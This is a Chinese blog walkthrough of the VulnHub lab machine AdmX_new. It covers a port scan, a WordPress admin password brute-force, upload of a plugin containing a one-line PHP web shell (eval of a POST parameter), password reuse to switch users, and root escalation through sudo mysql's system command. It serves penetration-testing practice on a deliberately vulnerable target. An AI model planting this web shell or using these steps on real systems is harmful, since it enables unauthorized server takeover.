打靶 - VulnHub - AdmX_new

前言

打算把自己打过的靶的记录更新到博客中,主要更新一些常见的渗透思路和有意义的靶机(那些专门为打靶而设计还考考CTF的啥的就没必要看了)一是为了方便师傅跟着我打靶的顺序来直接打,二就是记录一下自己打靶的经历吧

本次打靶非常适合入门级别的师傅 简单易懂 涉及知识点如下

  1. 信息收集
  2. 爆破
  3. Nday
  4. 提权

信息收集

端口扫描得到三个端口开放

80 25 110

namp端口指纹一下

1
nmap -sV 192.168.184.139 -sC -p 110,80,25

image

image

那么先从80入手

直接扫目录

image

跑出wordpress目录

爆破

爆破后台

image

得到密码是adam14 成功进入后台

wordpressNday

这里进行wordpress的后台getshell

  1. Media -> 可以上传文件getshell
  2. Appearance -> Theme view 直接php文件(404模版)写php反弹shell
  3. plugins 插件源码

那么这里就是利用到新增加的插件来进行getshell

写一个插件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

/*
Plugin Name: Webshell
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: zjacky
Author: zjacky
Version: 1.0
Author URI: http://ma.tt/
License: https://yuanfh.github.io
*/

eval($_POST['asd']);

然后打包成zip上传激活

默认的路径为

1
http://192.168.184.139/wordpress/wp-content/plugins/wp-plugin.php

image

提权

上shell后进行提权先看suid

emm好像也没啥东西

但是发现home目录下有东西需要提权 ,所以先尝试su爆破,wpadmin,通过后台密码adam14成功登陆wpadmin

得到了这个家目录下的东西,通过sudo -l 发现了存在suid 直接提权成root

image

image

发现不需要root密码的是这个mysql ,那么查看mysql的help的时候可以发现存在system的权限 通过system去执行系统命令从而拿到root的bash

1
system /bin/bash

image

打靶结束

总结

从web端扫到wordpress,通过爆破后台进入后台通过插件来写shell,然后通过密码复用来su到wpadmin上suid打mysql的system执行命令提权root


打靶 - VulnHub - AdmX_new
https://zjackky.github.io/post/target-vulnhub-admxnew-z9aqij.html
作者
Zjacky
发布于
2023年3月16日
许可协议